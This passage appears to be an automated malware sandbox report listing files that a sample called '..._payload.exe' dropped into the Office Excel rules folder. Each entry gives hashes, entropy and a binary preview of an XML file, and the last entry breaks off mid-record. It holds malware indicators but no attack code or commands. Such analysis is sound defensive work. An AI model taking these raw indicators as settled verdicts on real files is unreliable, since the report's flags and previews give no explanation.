                                                                                                                                                                      Preview:<?xml..C...ZV.q..t....U3P.....SA..G-J......v..Z+D.H.XTs..B..k...b..O!.K..B.J.>.6$.F~wn2l..*=$....b....E[J.a.q_..)....T.vKk..DD.`W.x.wx.jL.C...h..S.w..L...`|U..4..,..N..Qz..x.dt.1.&.Yt(E.t.[Z..A......&..........`Q'@P`....8."=il.vA[.....N.,**..Ct.F...Nd.....Dm1g.N.WEY2@..".(.......F^.Z<G.J.8..T........T{..n..O&87.N%b.#.c...;3...tb...u}po.i../6y.{..Yz(.zH..b..[.(6{2.,E.....O...).s.......Q...*.8.B.....}..B..e......U.Y._...8.x..b}.T9..^T[.G.|S~`?...%aa;|..jm7.eWa.%c.."...mb..h{.?..{.\..aIjs5+r5..6...i.q;..N..D..2....U4.X|...a.N.g3]....]nx.......cmO..H.+g%.....%.h9Q...b...YW.X.@...Ih...1eIW.6...T0....o.........U7.SY...g2.X4RZ.pP..wt..Y{....."./g..8.m0B.....C...`f.a...t}.i: .:t..U7*O..~.....R.n~.w..zC....m.4D....*....."..-*.6.[G..}D.v.D.o...b.H-....."4....N...:....1Y.jyD.e.c....I..i....;`.X/.......\=.._.G.....y....k..k`..e..2..YD.y:.A!4-.7x... .o...).;...o.2U.!.......m.Y4.............We.;....P...e .SN...............D...T.....K.i...F...R..J4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120125v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1269
                                                                                                                                                                      Entropy (8bit):7.842194784932721
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:iz3RMBqAlUnMkxxPcxYAtKKkIIkFwzSPAuip/clRXL6hPOg2bD:iz3w+B3PwKKeoAilRXLJTD
                                                                                                                                                                      MD5:E6FEB1330B63F75FB1134BB78A1852C5
                                                                                                                                                                      SHA1:0D9897EE78E4D4ED0DFF57FF441F477CAD6CC2EB
                                                                                                                                                                      SHA-256:12BACBD360D523F0C27DDAFFCFD46056E26704757999328A2EA7B62B701B3737
                                                                                                                                                                      SHA-512:F4900F822FA7116536FDA216B8A7044843D012FD5CEC974486F20A799522D5F6968BFD7DFD11C481F3C535BA53EA61FAA3950882781B1100545D2E2007B8D07D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....t.z.........D..e.Z..C......*..G.S.,P...N.T.%7V..eE;......_.............+AS^.N0..4K...F..?C*..;f.9.)........G.{......>.*.....m.(..ey...I..a.k...I..k....{M.....u...'..R/../2...IU!.Y..m].?.w0.....L..,e....#'.....t..b..4yi....YMI....1.0;.......85.Kk.j-....l..n.Z.1^..p3qM1....i.qC..=l...o.....&.....>..QW.....=#......).'.y.A....+..8?:....*.T.._KP..j/....k0.Zo....t...{.$.#`,4UL..C.....ix...kh..Ae.i.>..s.....).B...K..V.8X....3.#.z......q.).........$=7!`E...|Y/..8z.V..>.RPU.6........MRg..%..qk..X..... t...Wm..m.L..g..v!..Q.....qbp<....tXz.x<..8.2.l.J..>.r..D..653.1...n.@R.Z......Jz].Cw.!Qz..5;e{3..j...B.E~..#"8...4`.3........'.`t{$...M..?D.i.|...Z..`..K........F(..B..]..<9,...C.Q.~.+..>L*_..<c0..'....0"2`l..H2...b[W.G...lG.......W9dDQw ...q...MR<....Qv-..T......f.E.I.#..5f...q.0..1x3??.>..y.i.....c(aU8..]E..B..{.u....Io@.T.....$..\.....ew.QZ....9.%k...T.K.>..;h.[..q=.e.p.u.f0.a..W..eW....K9........}?K.N..5.J.....qXPh..2..:.-..*..6....g..U......U

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1994
                                                                                                                                                                      Entropy (8bit):7.889102599691078
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:qwKcHLp9vyohvdyBVDaUO/5JcSBqtbLkd/wJGQF85g8173QrMwXGf52sGmc4BfMl:Rlt9v7wDClBSpG9ggdwa2sYYMY8kzOVD
                                                                                                                                                                      MD5:872AB995B6FD260A6B9D412B44FEB7C2
                                                                                                                                                                      SHA1:CCEC7419AC68E0C2E69D4C321A21E8AD91B52BF3
                                                                                                                                                                      SHA-256:7FBE38662131AE2EA30AAD8D1CBE26684B31AE08D4CED4802B8A7D839E4ADA22
                                                                                                                                                                      SHA-512:B886B9E80A1933905A53BDF2E63234B853692FFEB3B25708D0E0FE08E6707A525467B0ADAA246C2E313536CDF74CACD7CA030D0C63C536F378CAF2683D912328
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml;.(..@9...w....,.u......qmc\.....(\..*.U.(.;.R`...SM...u..0.7....v.ug...]...7.z...+.I.[a....{...;.M...u]w....4o...Pj...|`7..K.._..\V(A...$.....!......8.#.*........%.\..t.>I_.G.5.....Fd...p..=.RkGE.Z.......!.9%}-.....R....#..P:b.Jo.m.;|.b("#...'1......)YTdz.az.F#/......1[~.p..D...........W)Zj*..6*....@6p..R...L..1St.r+...+.Sg.2.D.5......S/...B]-"#,.:.jMl........Z.kgl...u...N}.,.,"..........tO...Crf.{.#..B...}......7K..L....eW.H\.5...l..H...&M&E...^...#R..%.9..SP......,.~..x...%...1K/...kE^.9"..0..._.....d%.0(k..r.6R.V....+_ld..Y...m.4.E.T~...}.yM.$..@..cz2d.a.V.>D(...C...13...m.)..w.-f....Il....\@.0M..:....*.P%H{N..-<}...N...7a.o.......L.).=E..>...3..'0qf.E=.n{.....7..p.@k2.D.!.e..E.J|KA..0.O.X..!J.V,%'.K....R...6dj.o.?@bj.\-.#D......?..I."..C.nOD.-.J.Oy....za..J.}I..F.....fP....P.....4W@...._.Z..w.Z.2!...i:E.g...{X...6.D.8.:.Xw.6.b.s*..P..w..!...8..8.#K..,=N.I....}:I..1..B.."@....Y...%.VY%3.?.fa!.0..H2te.g..X.0....$.k..rdI.z. .

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v8.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1506
                                                                                                                                                                      Entropy (8bit):7.872425138682427
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pGoEADRIey7phpoSEcgawmUtyFUygO4AX5+t92tgypqdOo/Yu/8F5LhtId2bD:pGhAye2phpoSNfwmUtvoBXGQtS//YjZD
                                                                                                                                                                      MD5:6CA318C0A7B35CE5BED1E4930D3CEF38
                                                                                                                                                                      SHA1:CB9803254B7F321B08620CFA7BBF80E90F7E48D2
                                                                                                                                                                      SHA-256:5D5E547A11B595C72F62710B4AC39B629A0A8E00D3A72BD16F79C54E5C99E5DF
                                                                                                                                                                      SHA-512:FDE6527947090A17B3D1CFAAD44EF2F3119722E94FAA95186FD3CC7D89F5005050110118E656DDD81094F24EFD69000381FEDE81743CDCF9C121A332A5EE2C88
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlOVY...~.......a..D....X....b.......23@.\...C...g..aF....75...(...........,.pj..}z.H.C..wn..]..}w.y...|..(k7....'X..eb1.A..b..xm..%.O3...au.)z....Fu.u.Ej.dJhx-Z....q..9@"S.....2+u$.+....Xe.D..2...Hp..M... .I.X.0.......p......=f...W+?.co0.x.F9i...3.+.,.#@....).S5.>w...l.D...z.7r...... e.......v.|M...n...p..z.."..{.!.........t......g...'iF.l.-...@P..=K...\..4.8.'..w.htj...&w@>k....^.n......b..}`z...;...........2.~..22w.|..Ef..ZK@.C,.'.C..3z...6Pu...c....N>$..bOO:.Re...]...V.....2....,fj..).EJ.-3.....t4....J.V..5.u......u[.r.......,.L...5..q.iyM!.\...}-. .Ka..P....R`.;....;..L....M.s.Y8.K ..'...$Q0.9...%.K....92....Nd......].(..K....k6.....;.G.%RC#....^h.+.34..Z.=..4J.=r..dJ+%.\.4..0..G..N8.v)iz..!.$..}."Y"..B/-.....Q.......#.'..0GG.F..&2.W...K.C...\.fiaT.*.y...7(,`m2mNI........[..ZjhH.j..........B. ..3.la]n.\.dv...u..d..s.r].1.).b....,...^...w'....C..Ln....F...Qy..N.Q.s.Cl+6.D....A.n..A<......w".ku.R.......F.......g..._V(.EU..I.J.....)

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120127v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1511
                                                                                                                                                                      Entropy (8bit):7.8857997459134985
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:KRF6+Fa+wPDaokNhoiuqq1O60PdA/HZcXtTRKBuXxSukbA8rFNaOqG1DE2f2bD:KzvF0+7DoxquGS/HK9douhMtBN5wLD
                                                                                                                                                                      MD5:F293F054670CDB222B6EF6E7C2D815D6
                                                                                                                                                                      SHA1:F257C4D4B0A820C3540B48D25BA5649F37755B90
                                                                                                                                                                      SHA-256:FCF27DAF125D9C696F2729F9327115616EDCC63C6C09E3B06526D0CF26A0B044
                                                                                                                                                                      SHA-512:7F2DA6AC859B727505944997374335EB9B9B01F0F5921F9B593FCBD31C6C044CB24B15FCFEFEB8BBE8759CE6BC5D27311ACF1C97380DC0EF144F296A9599241B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....8s....ak.HB.?2..Se4.~|C#.Z...v:.K.o.....\.\.S.7m.T.....U.r==.}......*.3b..}.0..I..u%X........~}[......SP.C......8..u5..Y.4.......Z...)MA...3..Y.}'i...8......BJ)?.fe.l.<t....M%.6...?../ .9+.2^._1az....-...!y....6.....#...........X.......Kv..~..+....S....."...3.oY.Z...J.R..9....u.R.... \.]~.......;n.z.U...(.\...mZ..'.....~#w[.o...hj.../.:.....m~B.}..5.......b:.z..c.d../....6+|....l.Az~.q....a(`.>f.?R.w.9k.XP@.m.8k.Kp..=..)<..6J...;.q.Nu<.QZH....a...;.. mR-z*....W.&.^z..8..?."....~%9X`...3.E\......>.q....H=..^)\.5ef..I{.>.=2..%R'.9.b.5....j3..$..?x.:...U..........~..y.]O.h....xe.A...........Jj...d..I..".8\.UN.r\..Ul..!.A.+...O.%Q?<..\....Z.1..../...wK...;oQ^...9...;..._..|>.D.U...."Lh.......R.,@:...G..H.M.A?G?..V....)..:K..v..a...#...Wy.U...k3|(Q..x1..(-L.zl'J..[`......7.:.M.......bU...YQ..W....153......I.=.........sQ.......S.-..5.....<o.......Gp..49.j.%....^.-n~.@.TL.cV.B..&8...F.n.^.f.yO.{.T.e..GN....=.f.C._C_eH....%.?.b..@.K.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120128v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):991
                                                                                                                                                                      Entropy (8bit):7.7901532708699675
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:DSPpmSj06JOGMzZWYuc0rZwbbFxrJkhjOAVj7POJxbG2bD:Og36oGMzkjZYbvQjxVnu5D
                                                                                                                                                                      MD5:BDE75A18A0C4372ED30667481FAC6B2D
                                                                                                                                                                      SHA1:3AD5FD91064FC1E8BDDAF64AAC128347CDFD966A
                                                                                                                                                                      SHA-256:7284F8F0305899DB35760BC1424D7E6002EEFBE437A03488A637C0A95F7D0224
                                                                                                                                                                      SHA-512:01FC0901677BBE57D70DAD01CA3754887B65804FB3C3423FC9718392019BADD1D9DF708C634E0EE528827A79E45081F8B4E3C798D0400A9AB80AA00456F83A47
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..;Y...T.....i.9rx(.(.....r!bZ._..P7". B.>E.1.3..J.o....EuJ..p7o@.\..oc........yG.Lj...k..k-...O...<.g3.s..j"....b.q.n-xP..].Dn*.|.C..*L.l.o..].u...8.T...ST...&....%....c."........_.1*K.+.N*1{@gq........}..{..K....@bk....Y....z`...D...H.V.8.<H.........V.}*....0O....N..=.%=.C....l!.;..g...c.5..`..u9.0...x..^`..Y7*/...w/Z1....)0....[.:n.6N.....+I.......cx.{.u.G.Hf.......gnq..%.......Y&...hE8....z..YJb.pk..P.7..]..:.@}m4...A.7\1....+.A |...}..B?i.@oF....60!....K..i..X.......iOK..;s.. d.x~..j......>........Cq.>(....0}l.^....K...1....*./....\..Qb.O<....'..sp.,.5..Q....=.g.o~.WQ.............* w...0..&..g.#H._.....*....P92..S......D...JJs....Eq...Z`.L..z..!..qY.sJFi...^v=..v...y..X....v...9$|.F*1.r#...s........pvs=_...U.......Z...V.Wm. .....K{I.~<...)m%t`@.Q.\[.C.vH..&8.....D.-H.\O..3Qg.O!L..$$II.I.=3........4[....y.....4.G.....}.W..?.'V....J.Xp.C.3K.zV..M..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12019v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4150
                                                                                                                                                                      Entropy (8bit):7.9477758604096
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:IRX6PbHGmmpPlDtrXgt1UtGDspnErIZAa:IRqP76tszaXZz
                                                                                                                                                                      MD5:8AA8FFE0227407444A8DBEBE2098368B
                                                                                                                                                                      SHA1:5B190110CE8981075D48CA894A7B941CB56CF436
                                                                                                                                                                      SHA-256:81491FBB88F86C59E9A6CB5E7378B5597F5CE8AD7996ABCD663CB99EB8EF2645
                                                                                                                                                                      SHA-512:FC26BC87E22D38A6B01BA5647F7C5D46F3D1802BE43C6B88050A26491503187AF7057F8067A248679A512CAB5959E77DE0F355659129C20B18459B2CCBA48AE2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlE%Fb......[...B.0..uQ.^B.W.0.)a..P..d.y....{4.F....D}.}R,...sJc..u._l...(Z.,.O(!..3...........F.....".F..4.Nj....Y.....er;...8.."oT.`[z....J..s..S..~..)8....B....Y......R....z.....n-.)o....*........,.^v.D.u....4..GE.p.<.a.....I...pw...9.In{6..rL^.....>...A^.]R.....|..H2B..C.8..9DT...C...z2l...(.!..2}. .].....Y..#.A&.<..&[3yg...EV..BZ...i.3....dr........P!N>.}...D~^..}...{"r@..q.R..I...H....}B...e.8.c..bW<...12j.~..i>...v..j...l.......5B.....c6#.:S.Y.O....&k...b..B.e<9B... .L...:gl....y..y*.C...F..b.Z..e8+.9Yv.k..T........8@...d....$.....Yq.T.a8|..b_...k.Bhk.V(....C:I..w.]4BB8.c..`..AXmV...s)|.&..sd........\.Ogx..B.O.sURH..Y...Y......h.....Z:...kc}..P.......1LS...Z...g._.W..p..g9.&...1...en...B.A..9i0ue%....U$. ....5.D.z.4.g..]%......b.{.P<wS...#l.&...M......O.0.>me.b..[Z.....9.6p...|..PA.hO@...Kf....).=pZ..f..jx$..t.S.O@.......C....V.H..P.M1cpte4x...M.7.Y*Z....CB.~......0.M..R....f.:.>.\..ff6f.f..K...B.......X....x...*p..!I.#&Y...`(..%....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120201v14.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2974
                                                                                                                                                                      Entropy (8bit):7.935169196825783
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:WJ42QH+0GJVhw4ecwVaSikO6oGDoGs2CWRGkCoNYjtdoCPQyD:CbN7Vhw4xwXstaTspiSoNYjoCYa
                                                                                                                                                                      MD5:48D09430E7E32CB747C1ACC31F54596B
                                                                                                                                                                      SHA1:B7515BF03082F7C3A96114E47C69081D6E47E1D0
                                                                                                                                                                      SHA-256:20781CC1F6299FABD46B7C811711B787ED226D4DBEF6276BE69E76223E1F47ED
                                                                                                                                                                      SHA-512:165DAAD8F0B99B68B129B81F8AE2F5E0822A7B7CF8A10304D159218602B793185DC4CD73BE1EE152E97AC7520AC6ACB062E1AEDE2C7BF5A0EDC8F5DDB666A4FC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..r.z.k.p.bNQY....j4<...BJ...I.d.b*.._.zb.....Q...%X^A..0Mwkk._..M.8.a....".....~].%hd.\."..733.l/N!.......<h.+]1*...8t .`d...z^"..7@\...p-m.'s9....B....\..\.9.@.....i.".~...<r....bx6....D./y..+..(}..h"<. ..........*...,....i..#...0Q..yF6...7.h..U...d...i.N.'4..M{..?Fx...e.i.1.m.Vl...|..t5c.....3..bFHl..0.h......5)b.i..pv...... "....I...b..n...P&..1\...w[..+.........<+..HH.g.#q..Z.r$...{...V. ..8 .;.~,.YwA$p.2.R.I.4......?oX.+.n.Y..S.bh.;...X...D..=W.%......j.{.....&c.......o5K.*Z..Qv..*L.l.,...z..o..t.c.W)....].a....c....N2..#..%Gj.If..1nn.=@..!.E]! ...H.MkU...Sg..=..KC.a..6.....G.....;.. ..<...f....N.;..*W.8h... .T....x..|....=N.Y b|:e.T...b.2........R.{^.tk......@.....Dy89.e....3,..*.....(..].KC..|]5;....Z...P.k=<9.[0 ....v$.{!..u.e^......Y...X.>.._.%......cH..XCc.eo{..P.+....Fs0..P../CW_...W.J...u3c.B:.....?..F........y!....n...."..;i)v,YA.9...q...cnZ!...6:...K+.9A K.U.H.u......wH...c...+.0..K.....:..+.e.....o,

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120205v11.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3363
                                                                                                                                                                      Entropy (8bit):7.943565786506856
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:vDZkZkUmieBzxQwEe7aRzaW2iGWE7MUjLKP4jCUns9g:tkNm7ziXJRz2WEjLKgvcg
                                                                                                                                                                      MD5:6D89FD8F543CD8077A88EA340E1DC934
                                                                                                                                                                      SHA1:5346BE52D4F062C6720AC181F4732F4F69F88772
                                                                                                                                                                      SHA-256:2AECF43A1F1E102E981CA4A068F53116B9CA34AEF9BA0301C32EF70B5B65EEB4
                                                                                                                                                                      SHA-512:79926ACB45E8F06CC84DFD71D51D880CC036A5AC0138CB9C33994E4B34933D71A1D9AB80F3D4B80D817CDF0E429E99170D5DB4CFB20F0C342181A967A180B0B2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..i.*......h..I.0~X.CX7.... z.>j7..(.a..`Z.a.q.oz......1.....D`...th.?...s]0f.o..n8<E..;f..)..*.~..=..t....Y\...,.J..E...b...X......_.......>f....&rr............R.C.q.@.wMRK..8|.Uq...y&[..Pw.)E......t.Y.7.;T...].nh...X......K.g..B.,..8.KZ9.b..m.....'....D....'..x.Eg...a.f..v..b.p.0.y)...Nl.k...M.|?...m......d....w..wu.-p.lw......$.O-!..u.g..n.0..c.....'07.$..E=.0.q.i..+.4.A........./...1u.a.*...D..1.9.<.|.......?/..UAD.L\EfA....d.7?u..2.2.uW.%C(..r..&H..t.J...+..|E.a...T.....-7sH.%X4+8....S..ER.B>....U........V....yL....'.=:.....H|.zs(..#4B4. .....RL.W.9..t.G...?i.O.e..W...qrQ..I..D.n.....[..........Mk..H.]5}.K.wKm-g..?V......~B.U ...0A\.R..1.........=.j>....E.$.P.a..1_}../.&".)ZJ.7.tf.C.L.(.lG.#2>$... ....0.2?..i....C.]..3..JFeIM.p.Z@3.Z.x..j1........U.d....ZuI....]M....Y.[..$...u....|.....AS......\.....S....b.22........;.R.o....#M.R....g.5t"..;..v-...D.......e..X.....G.e.J..G...:.c..0..e7.|.*.u..]S.7.x....l.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120300v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1295
                                                                                                                                                                      Entropy (8bit):7.848754744115135
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:oTBP6byfSTRl8mrfKrdQUoQzXEA1WzteMsLQxsl+sWXznD+F0AxBIgvSJXHKjr2X:gzatHrfK1wZxsLQx7sWDIW+SRHKjYD
                                                                                                                                                                      MD5:9EA138355CD8CE1CBBCB10B1364446B0
                                                                                                                                                                      SHA1:1A424E24B9AF78A07311DC8915B7F3D5EB214AF3
                                                                                                                                                                      SHA-256:8BC9F643425AE7CC6FCADB880C3A6C9D3DDFF96DBFA2321E313B6226A8FAE970
                                                                                                                                                                      SHA-512:B577BF96C632AB6E4C67DA0740C66E3EEDF3F5BCC0BF490AE82C81798A7F56A9652F7160D0445F361B7E1878A56B2E7087F93A6AF097A6EB2C48ABCD97D75F44
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..}.....\.....jy9%..(..f.\.AMNW.=.....;.8(.....(.Q....:.x....iD......On=..X.;..(.:.5/ce..1/X..n.D.E..?.......Q..z.r.T.;'v.._..6.9......=M`{.W,......#..u......V.d..q>...n....#Z@t..1N.:..1.L.@o._{...:.l.^i.........X4S|M..&)a..-..E?:<m..:..=...~o:...CSxm...+..T..5...s....1..0.n.ho.h$?J..X.S....v.U.-..6.-:(..@.H.^?..{.c.6#.....\,}+...IC.........m...<....n...6(T.c.3Wl.e.........~.M 4.U..I.E..ZN\.B6 s.6/.......P[8`._.vM..$.Z2..Yn.z.e.b...N Q.........*t.3%[..O....c.q,...e..S..I...0].eD..9..~B0.t)..6).e.!.ci.U..4...!E)..{.~.D......2D...,...V.#........$....,i...,...+l..m.lD..(...{..D6....e...@..v.}...._.?......XG......v.....69....O}>.K.......N..%r.I...x...*../g.....~...|u.m.dDag.~.j.^v.l.K;..?p...d.$..r..<...|.u.$K.r..[x......20...2_Y. ..o~..Cv../Pwe.}+.........y.....3.......Y.x.(`.&i!....#".[..a..m..})T.<..rJ...&..f....h.!qw%...(.E....M..&..E..M.2.B'#..{:*q+Br...#...4.s..z!..."..{>GSr../.J..s}_...%..(..2."..v....z./.].>..`.:.5....".... .}T.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120304v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2582
                                                                                                                                                                      Entropy (8bit):7.927426800678183
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:8XUpopSHapeLgVFA5fg3aixjtjRQsbrma7Xj+NR1oarUlD:8X1SHSVFAhg1pVn6cwaagd
                                                                                                                                                                      MD5:F55E2AF72C2C7E07560DC7EABA8A58CC
                                                                                                                                                                      SHA1:6D60E8D151C16A070B9DF65CA726CE46381F6B1E
                                                                                                                                                                      SHA-256:8F9FD6AEC95E0CF2DDB9058B28FFF1738873CC6C123BA0F5C9EB3EB11CD586AE
                                                                                                                                                                      SHA-512:A1F5D2306D3883F92C824ADE411FECD7A40CC10996C8186991723247B4A68A27B10AEC05442F99A6691D1483479301EBA187096CEFA25F3AB97356D2BC2011EE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.h.n..\..EC.| .qb.....&.?V2.@}J>.Bx.q...S%.d...9i.x5%..........}....=p..g....|..|.%Ri.......A...>..S...VQ.H..sQ..O^....#.2.jU..R....1.....:.z7a.....s...l@.@+.a.v.......E..^i.kZ'....u....U....J.....&.?Rf8#.L/$..E.H..B}...$. ..*.j>..nIWR.Q....i.f...(\.......(7`gl.......$...........%g.~..c..wG..D....U3.......Q+mT]...$....'w....R9,n.I.$..e.}.rp/.^.S...k....V....+.j..CG.w..........t..o........puV..E.]..Q......|....w^..QT.....K0......O..e...M6.......'.9|W...(Gk.(;..DM....in+.D...d....-g8+b..w..y*..]..N.]%.,..=.l.C...-.X..O........A.q.n[P..g....A)..1I.$..5...3......_...L...G4..[..<.I.-.."...IT.....t....=.F....]...F.1-u...hgT...?J..g.W.L.... ...........,......@........k...x....1..#...h..<n.e.%r.S....k..f.C.u".........-H)9.gq.>]..n.....5.$m.p.k/@..~..n~...\#.S..a{.P&.(..:..I..H}%....z....L.F+..D...V...8XUqN......u...._..DQ4.ET.i...v......?.Uk).7......a..P.....s].K....Qj.r....*.VY.'oZ.y#.......[.-../J...v.v2r...I...n...R.9....e.l..$..?

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120305v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1787
                                                                                                                                                                      Entropy (8bit):7.897072526918186
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ctYVxAOb9CmRybKfuwQSdS3ij/SO1JiDhouD:1bBcEybYuKT/SO3iaW
                                                                                                                                                                      MD5:2232BA03702EA9CB450B6A33EBD8C697
                                                                                                                                                                      SHA1:7EC5202738FD0BD2F67D29433663BF1F7B7849B0
                                                                                                                                                                      SHA-256:5697B2675A5EAC9A23596F91EACA0EDB0B99694F3CFAADA3D7C46A12B36807DC
                                                                                                                                                                      SHA-512:CDAF17362C4A8A4E20FC05F0A391D5C4FA1E78AE38F28BBF19134861EA7072E464551B9CB7171F906B38B3155CD4DC930B883CFB97FF13AC609DEA9151DD2FC0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....T)..X&^..Yw(pB...;..v.....Z....5Y,..e..k.#.R..td)t.h-....N.3fg..x.....L.........N.a.D..x..=.:.~.h..f"5@Q.YV..{......i;q]n.R.f ....L....3..F..L...,y..n| .E@.K.....o....2.<...(...1......D6.Ot<............h.R........P.".*.&.....v;..cH....w.IDv._.r.n.....h.s.....D....@{.u....O..T...a.../m......fRO.AZ..-.9..[.b.Q..Ty...%.i99.......53..FY.Z.2v....U....?..bF.D....0."...-!u...hgm..J8,.Jp...j#..a*=....A.T.l.la%.......o/..m.<....q...[K..W....ze..J.:-..`.b-~#M..@#T...o..p...j......3M...3rY.......D..D.'.".vH.."v..#.8]..U..0...2.d......76Q.rT...P...D.C...Y!.7..D....eS+..&. .[.>z..O.d.]..U...UT...VC...S...@.m/.....T."...'.d..r.@....l..X.y..X.5.$..s}y\....>.........?..D.m.17...p...}..L...g.E|6..jb...k....".*.......:X.....4...4.....}.Q.....{....^/...*.....nKy._`.#.mz[..^*.Gh{H.n&....V...7.$........{.....y...3uM..-..Z..@ .|..&...x......x..1wH.e.(.Ck~h#......../..........`..6..`,n.+...s.@Q..7...\^.f3~:)b..._.XQ8...5.....).v...ud.U..Ox...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120307v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1583
                                                                                                                                                                      Entropy (8bit):7.8581087843299855
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:RgCGreMTgf94cw39r2tXIy+MZCPkKU7HQOQX51D:3GreMTglVw3paXIy3ZokazpN
                                                                                                                                                                      MD5:881CAF54418A77B426FB3BDC2D04A074
                                                                                                                                                                      SHA1:B360E9DFE31F35B55CAA60715E59EB4DD45C8EBF
                                                                                                                                                                      SHA-256:7DF79CE835A227F609F54E29D61F6D959667F90DC8C8E562472E37841D14BACE
